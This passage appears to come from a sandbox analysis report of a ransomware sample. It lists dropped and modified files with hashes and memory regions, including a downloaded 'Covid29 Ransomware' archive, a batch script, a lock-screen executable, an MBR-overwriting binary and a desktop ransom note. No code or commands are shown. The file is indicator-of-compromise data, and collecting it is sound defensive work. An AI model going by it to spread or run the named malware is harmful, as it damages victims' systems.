                                                            11338c344e2123034995f6dd5c1fb2f9f39d42b4e91754cf7af4876b1b9d9271

                                                            SHA512

                                                            72241573516bbb5523af8823ccab377c08e719819a77f4dd99387a9662c3a9bdbee12d88efaa7ea1d6a74ae17c147d394aa3c54a1cfcabf7fc57488e63c442cd

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                            Filesize

                                                            4KB

                                                            MD5

                                                            794a5f5d474334d7ab52abad0586cda1

                                                            SHA1

                                                            71415c46a98fea6f09e6d97aaff0c8c196451b89

                                                            SHA256

                                                            20e17f7b4741613b7b909ba40372a23579b04484ddb68be1933a7c7660a10cd7

                                                            SHA512

                                                            0e4462e8b7c88f91ecc61e89a26b079e52e735600521d72128761ff079ee43c44492751d2fb2556c3dabbad9047228c220d42011523fc01a3566935976542edb

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                            Filesize

                                                            1KB

                                                            MD5

                                                            0db0818b8201303e3498c773310cf35d

                                                            SHA1

                                                            9e20ac97a0173935460bdb02b80b8ed07f310272

                                                            SHA256

                                                            e5b8df3d436c3acf927bc7617b83a8d47ab520b69193242cbae308f6691e54a0

                                                            SHA512

                                                            5dbf475bb6b2282f5d10aec63a605ff2ab4faf92e428a4e2f32247b6f7fc90cc640c9dcd46749883e27be75aa9f7120a291960427a9d3c7712d18bf00ae055e9

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                            Filesize

                                                            59B

                                                            MD5

                                                            2800881c775077e1c4b6e06bf4676de4

                                                            SHA1

                                                            2873631068c8b3b9495638c865915be822442c8b

                                                            SHA256

                                                            226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974

                                                            SHA512

                                                            e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State~RFe584e88.TMP

                                                            Filesize

                                                            59B

                                                            MD5

                                                            78bfcecb05ed1904edce3b60cb5c7e62

                                                            SHA1

                                                            bf77a7461de9d41d12aa88fba056ba758793d9ce

                                                            SHA256

                                                            c257f929cff0e4380bf08d9f36f310753f7b1ccb5cb2ab811b52760dd8cb9572

                                                            SHA512

                                                            2420dff6eb853f5e1856cdab99561a896ea0743fcff3e04b37cb87eddf063770608a30c6ffb0319e5d353b0132c5f8135b7082488e425666b2c22b753a6a4d73

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                            Filesize

                                                            5KB

                                                            MD5

                                                            1f4b997bd28b67344d3fd8325c67a61c

                                                            SHA1

                                                            c93dcf10387989286b68d0b5898abc8f6b7f5aae

                                                            SHA256

                                                            6efde25474ba5f1cc6ca64bc969e4ae849a09ad55c7c3d6ed5fb5e71de64ec1c

                                                            SHA512

                                                            3985d263669ba737948dbae3d8cfeb72af88606abc0258ab6bc919240feda27d00f1e9a8481be5709c22aa9a9f3075d1b610c3c5945271466957affb12ef02b9

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                            Filesize

                                                            6KB

                                                            MD5

                                                            4390b5e67c3eb42ac389a3324111b818

                                                            SHA1

                                                            06be57f911dc6f84bf45dbf0840937365a120811

                                                            SHA256

                                                            1ac354667e319181365f3bab3fc27cbd1a21ea730188f0c6484517b5833592d8

                                                            SHA512

                                                            734e65911b45add1dc02e740bf9ec1dd51bc7789bb5c67d38667fb520bdcd34756c3b863e160d5fb162fcc7653f7330ae6afac9a08917dba4a4d06ad876c4c7b

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                            Filesize

                                                            6KB

                                                            MD5

                                                            bb90f40655d57864f1dc49f993c651fe

                                                            SHA1

                                                            f4be0f616538582a084163e88557cc88163ff293

                                                            SHA256

                                                            6fb114fe4b6d936b2761cc8249fdcddeea00ee16e2cd2752ebf22473b9f9c899

                                                            SHA512

                                                            4561388fda69f0c4d355c6f9af00b46f6c94a16faa0a7e65d27e3748c134f3def03bfafee98519108f4d34567705c308db5fb99963813dbf54a55bd859ace9bb

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                            Filesize

                                                            6KB

                                                            MD5

                                                            bebfc67aa7e236d22d0b96463bdd0955

                                                            SHA1

                                                            bc25df7c2ada4b1e8a0152f8f3854064404ba2c2

                                                            SHA256

                                                            8e02e17dbebfea624fb1c682bea5926bb985f9271bd12b3d82f9e216ecf5ebe7

                                                            SHA512

                                                            36c12323a3534edb5e376c954a4930cf4b8b1754b06401b7e68056560f10a44a4918303e6bd0efb3c80ba9269fadc84a7abef5c099cf11bb62a70218c3b1ba63

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                            Filesize

                                                            6KB

                                                            MD5

                                                            0bf5b3dc44f39248e9bed229ff4a418b

                                                            SHA1

                                                            e19d55ac665f094c9b2c7e7c0ef0f9097b67ddf5

                                                            SHA256

                                                            adbab17c6db43d8e10b8831fef206be7b990fa75b3bc423d032e3e51438c1215

                                                            SHA512

                                                            579996ae32509015e25298c1c6237db412bd6b6814f621d3a81e28985c68b1e0c8c5ae08fb338e12f9f0c2fe899fee72f1c6df172caaedc7bcbbcc1c357843fa

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                            Filesize

                                                            6KB

                                                            MD5

                                                            3f7897543349c78e6052187d4c11777b

                                                            SHA1

                                                            ffd7b6eb129a638f3bf992c69551b042c545c9db

                                                            SHA256

                                                            b31929d2b3ae8a723547eef2bfed3d7ac6340ff87a4c0ad5694b98f920dd8fde

                                                            SHA512

                                                            210ebc8acd79f48b6f4a7828a774b98f88e4fe48af8374956962c15fe393d710e0974ab3ced4f8f8501bd391c45446a996a16608b8d895c9152544d3b83e2035

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                            Filesize

                                                            24KB

                                                            MD5

                                                            90cc75707c7f427e9bbc8e0553500b46

                                                            SHA1

                                                            9034bdd7e7259406811ec8b5b7ce77317b6a2b7e

                                                            SHA256

                                                            f5d76f8630779de1fe82f8802d6d144861e3487171e4b32e3f8fffd2a57725fb

                                                            SHA512

                                                            7ad692bce11aee08bf65bb7c578b89a4a3024211ee1deaf671c925d65cc016943f2caad3d57b365e16d1764c78c36cae35c3c45cef0928dd611a565b0313e511

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                            Filesize

                                                            24KB

                                                            MD5

                                                            0d8c8c98295f59eade1d8c5b0527a5c2

                                                            SHA1

                                                            038269c6a2c432c6ecb5b236d08804502e29cde0

                                                            SHA256

                                                            9148e2a2ba2a3b765c088dc8a1bdcc9b07b129e5e48729a61ebc321cb7b8b721

                                                            SHA512

                                                            885a734a97a6f8c4a8fb5f0efa9fe55742f0685210472ed376466e67f928e82ddf91ba1211389d9c55dd1e03dc064aa7a81d1fca3cf429fbaf8f60db8b1348c6

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                            Filesize

                                                            1KB

                                                            MD5

                                                            8bda48dc651320d800e229c437114839

                                                            SHA1

                                                            985f7778b72df2049090dce65751067129d0e77c

                                                            SHA256

                                                            b1d5872cc821873933ca4178a317aef98a54592180aea4dd3fe191974fa88abf

                                                            SHA512

                                                            ae57ecda2bc127c18ae4941851e5f48368bbe1539b4a8aedc5773cf00afe4f900844760055a9aec54452974e1489a337b2f803676c0b937ede2c5c4ed4c3228c

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                            Filesize

                                                            1KB

                                                            MD5

                                                            52fd16f961d14bb1f981c6ac34c65a49

                                                            SHA1

                                                            91c7f63947ac4c9c6ee3dd4837f2721b4bc2c13b

                                                            SHA256

                                                            5ba250a56eb70b9a7562a0211fb29ce4766d84bd5d923cb0c951c4746bafd895

                                                            SHA512

                                                            d2f1ef2bae2eaee63113c1eabcfaecdedaa58cf77b9bdab61f42dc48be0decbd9305903ae397afde1574dbbe3375079d5c99924faa2fa5f7694d58c19a1832da

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                            Filesize

                                                            1KB

                                                            MD5

                                                            a74b08f24e8a571bd79d10a87d1b29f3

                                                            SHA1

                                                            a68d6faf72dbb9bd2b19790acd8aa9e39e6411a1

                                                            SHA256

                                                            f21916c2ef29f479c79ad16667df9c31499cd74952d993647d88b1b4e42093c4

                                                            SHA512

                                                            58d2e158d9239c074669f65293877f7d611856d3c300519eabf4bffcbe4c891b7e6bd17437930cd919fafb958878202d73656d0fe787b2ebea29b35e6152525a

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                            Filesize

                                                            1KB

                                                            MD5

                                                            9c9c401f4b51b3e6842842e824ab00e6

                                                            SHA1

                                                            98a07925ac31fcaf83d4c0d5a76a73133a5ffaa3

                                                            SHA256

                                                            86370131df29a6b73c8153ea30554d670e9342604e07128512a78625663909d5

                                                            SHA512

                                                            ff9d695e6cf05268d1902af073bcf644403216139da9c8f67dda2c6aa15878aa959a87fd6e9e97de9c540a800d84f19ab3e50a398adb062c7d9d7780d8ad96c0

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                            Filesize

                                                            1KB

                                                            MD5

                                                            a7f67f11281ceca60163ecc4c8c00502

                                                            SHA1

                                                            bfe9fa682e0d0d5f6607014841cd5cf4f55558f6

                                                            SHA256

                                                            ae4e4e0d95cff9ca64d60738afb20d9f3cf268f2e4e11b656e0ba65697ae97fb

                                                            SHA512

                                                            88c964daa9895aeb84c8ba7d02ec7a88118bc7534fe619ca506e2b3717abf12d84aeee5a91f246fd8d7150e8ee968c6dbbea167964ccc567754ad7ee2327ea91

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5829f9.TMP

                                                            Filesize

                                                            370B

                                                            MD5

                                                            d6849ff15652f244563a85aa7d2812f6

                                                            SHA1

                                                            220cbcb343cca58d5ced959d86f04fd40dba7ad0

                                                            SHA256

                                                            e0b408a73c08cd37dc3233d2ba4eca1a5f27fb51f09c6b77e9a767e211cc6638

                                                            SHA512

                                                            bad4b408b49a6f7efc0da4b59d3f5e7130fcb09cb9e1f8ed603578b1f6811342def98763de061fb79d69aa9417e3192c152cf3bbfcf18cbfc1d702b4b789d4c6

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                            Filesize

                                                            16B

                                                            MD5

                                                            206702161f94c5cd39fadd03f4014d98

                                                            SHA1

                                                            bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                                            SHA256

                                                            1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                                            SHA512

                                                            0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001

                                                            Filesize

                                                            41B

                                                            MD5

                                                            5af87dfd673ba2115e2fcf5cfdb727ab

                                                            SHA1

                                                            d5b5bbf396dc291274584ef71f444f420b6056f1

                                                            SHA256

                                                            f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                            SHA512

                                                            de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT

                                                            Filesize

                                                            16B

                                                            MD5

                                                            46295cac801e5d4857d09837238a6394

                                                            SHA1

                                                            44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                            SHA256

                                                            0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                            SHA512

                                                            8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                            Filesize

                                                            8KB

                                                            MD5

                                                            44e4a763f98c94945aee146ff17e6741

                                                            SHA1

                                                            56f9cf8ba5211385bc2ec5e65b5900a7efecdea3

                                                            SHA256

                                                            5fc9265caf60ebcba6c997368e2b5412f5c9dc5f56c6b345392fbb686d60447d

                                                            SHA512

                                                            7552050ad7560e2221b72c3e4c95ce5cbb5780617c5e9a8b9adc02be9d7b27fdd361332257b471869a6385972c615cf9a1b2a7021581883c9b5f20b42c22e214

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                            Filesize

                                                            11KB

                                                            MD5

                                                            386a6f68a7805a447d77d2d9f4d20fa8

                                                            SHA1

                                                            4141780e7dbde532c80777aa3af4aaae575d6d6c

                                                            SHA256

                                                            2804e5b859391aa5e924adf9da61c7820a29219c3bea2b99c01c791d62f09905

                                                            SHA512

                                                            6743cbd8ca375a93df84de391e706ffed6bae4a716bd2c8c336c4d5f949cc6b7a861d9407a7b3382a9cf6877944065f19fc3df7be55f443c75b7c4c269360430

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                            Filesize

                                                            10KB

                                                            MD5

                                                            ea192f3c9b7af44e25e1953296c5db98

                                                            SHA1

                                                            b3102291fc929e50be76a50ff8c08f217083725a

                                                            SHA256

                                                            41d1181dadb09952066988a40f69bdc77ade14d4e0a0fec09b47fa832306984a

                                                            SHA512

                                                            ddeee87ea4342878c19498c22f128c70ea297630d686b70af525d2f6a1b7949738e88994f16c8d26f2dfce70e65d7fef6f3c6a99c72a29ef0533389522b55e0c

                                                          • C:\Users\Admin\AppData\Local\Temp\C04D.tmp\Cov29Cry.exe.death

                                                            Filesize

                                                            103KB

                                                            MD5

                                                            8bcd083e16af6c15e14520d5a0bd7e6a

                                                            SHA1

                                                            c4d2f35d1fdb295db887f31bbc9237ac9263d782

                                                            SHA256

                                                            b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a

                                                            SHA512

                                                            35999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a

                                                          • C:\Users\Admin\AppData\Local\Temp\C04D.tmp\Cov29LockScreen.exe

                                                            Filesize

                                                            48KB

                                                            MD5

                                                            f724c6da46dc54e6737db821f9b62d77

                                                            SHA1

                                                            e35d5587326c61f4d7abd75f2f0fc1251b961977

                                                            SHA256

                                                            6cde4a9f109ae5473703c4f5962f43024d71d2138cbd889223283e7b71e5911c

                                                            SHA512

                                                            6f83dd7821828771a9cae34881c611522f6b5a567f5832f9e4b9b4b59bf495f40ad78678bd86cba59d32ea8644b4aa5f052552774fea142b9d6da625b55b6afc

                                                          • C:\Users\Admin\AppData\Local\Temp\C04D.tmp\TrojanRansomCovid29.bat

                                                            Filesize

                                                            1KB

                                                            MD5

                                                            57f0432c8e31d4ff4da7962db27ef4e8

                                                            SHA1

                                                            d5023b3123c0b7fae683588ac0480cd2731a0c5e

                                                            SHA256

                                                            b82e64e533789c639d8e193b78e06fc028ea227f55d7568865120be080179afc

                                                            SHA512

                                                            bc082486503a95f8e2ce7689d31423386a03054c5e8e20e61250ca7b7a701e98489f5932eba4837e05ec935057f18633798a10f6f84573a95fcf086ee7cabcbf

                                                          • C:\Users\Admin\AppData\Local\Temp\C04D.tmp\fakeerror.vbs

                                                            Filesize

                                                            144B

                                                            MD5

                                                            c0437fe3a53e181c5e904f2d13431718

                                                            SHA1

                                                            44f9547e7259a7fb4fe718e42e499371aa188ab6

                                                            SHA256

                                                            f2571f03eb9d5ee4dca29a8fec1317ded02973c5dd233d582f56cebe98544f22

                                                            SHA512

                                                            a6b488fc74dc69fc4227f92a06deb297d19cd54b0e07659f9c9a76ce15d1ef1d8fa4d607acdd03d30d3e2be2a0f59503e27fc95f03f3006e137fa2f92825e7e3

                                                          • C:\Users\Admin\AppData\Local\Temp\C04D.tmp\mbr.exe.danger

                                                            Filesize

                                                            1.3MB

                                                            MD5

                                                            35af6068d91ba1cc6ce21b461f242f94

                                                            SHA1

                                                            cb054789ff03aa1617a6f5741ad53e4598184ffa

                                                            SHA256

                                                            9ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e

                                                            SHA512

                                                            136e3066c6e44af30691bcd76d9af304af0edf69f350211cf74d6713c4c952817a551757194b71c3b49ac3f87a6f0aa88fb80eb1e770d0f0dd82b29bfce80169

                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Microsoft Edge.lnk

                                                            Filesize

                                                            2KB

                                                            MD5

                                                            f150906bd0fe42873c771cfca6736424

                                                            SHA1

                                                            5b23516be65dc50014fa9d040b3a3c3175c4ece4

                                                            SHA256

                                                            b67f40ae6e1b3fe3b0aabd43e32ea7e993a4f21ae56757a9155ae467e805b1a7

                                                            SHA512

                                                            1694ed78bd2f6e3c8ad647d78efb42293b2a62f8ca9479e8e66ffdad32dde676a9647f035bb52f2993ddfc702851d19cc558cabe83debb46a16d5b976a2bd9f5

                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

                                                            Filesize

                                                            3KB

                                                            MD5

                                                            c66d40bf0610bf8bdeb6cdeff5b17b21

                                                            SHA1

                                                            3e281c5233e99a41c694f7f48a5721801617ec4d

                                                            SHA256

                                                            6fc457cd33a5bb6967413e84d3b418e4f0028adb629d80d45c2607c6b25194e5

                                                            SHA512

                                                            ae67448a037414e9b4dc3c2b0fe82c30f190a3f70e1ddc646fc6fa239c09ee3d1172e08389cfa05e4c93db43ae3dbe2a798640c185a3822d45a52b3246c96f90

                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

                                                            Filesize

                                                            3KB

                                                            MD5

                                                            0095ac4ff4c9418d8601f7347710f44d

                                                            SHA1

                                                            0e3879fa6c091febddcce6bf47424fb06b792316

                                                            SHA256

                                                            22308d089150452fff4302a6972679543642300a174ca7be45c525e7d1eeb516

                                                            SHA512

                                                            5fb47f65c6315564d73256ad10c6d3a6ca12f76c3859001bfe406e2b3b4ee0d70d6e0805e26eb0be02360dc48fb9a6d0bc7029f2a20b07a5e69a23da4bd7d12b

                                                          • C:\Users\Admin\Desktop\covid29-is-here.txt

                                                            Filesize

                                                            861B

                                                            MD5

                                                            c53dee51c26d1d759667c25918d3ed10

                                                            SHA1

                                                            da194c2de15b232811ba9d43a46194d9729507f0

                                                            SHA256

                                                            dd5b3d185ae1809407e7822de4fced945115b48cc33b2950a8da9ebd77a68c52

                                                            SHA512

                                                            da41cef03f1b5f21a1fca2cfbf1b2b180c261a75d391be3a1ba36e8d4d4aefab8db024391bbee06b99de0cb0b8eb8c89f2a304c27e20c0af171b77db33b2d12c

                                                          • C:\Users\Admin\Downloads\Covid29 Ransomware.zip

                                                            Filesize

                                                            1.7MB

                                                            MD5

                                                            272d3e458250acd2ea839eb24b427ce5

                                                            SHA1

                                                            fae7194da5c969f2d8220ed9250aa1de7bf56609

                                                            SHA256

                                                            bbb5c6b4f85c81a323d11d34629776e99ca40e983c5ce0d0a3d540addb1c2fe3

                                                            SHA512

                                                            d05bb280775515b6eedf717f88d63ed11edbaae01321ec593ecc0725b348e9a0caacf7ebcd2c25a6e0dc79b2cdae127df5aa380b48480332a6f5cd2b32d4e55c

                                                          • memory/4048-843-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                            Filesize

                                                            864KB

                                                          • memory/5332-931-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                            Filesize

                                                            1.8MB

                                                          • memory/5332-813-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                            Filesize

                                                            1.8MB

                                                          • memory/5332-937-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                            Filesize

                                                            1.8MB

                                                          • memory/6012-844-0x0000000000C00000-0x0000000000C20000-memory.dmp

                                                            Filesize

                                                            128KB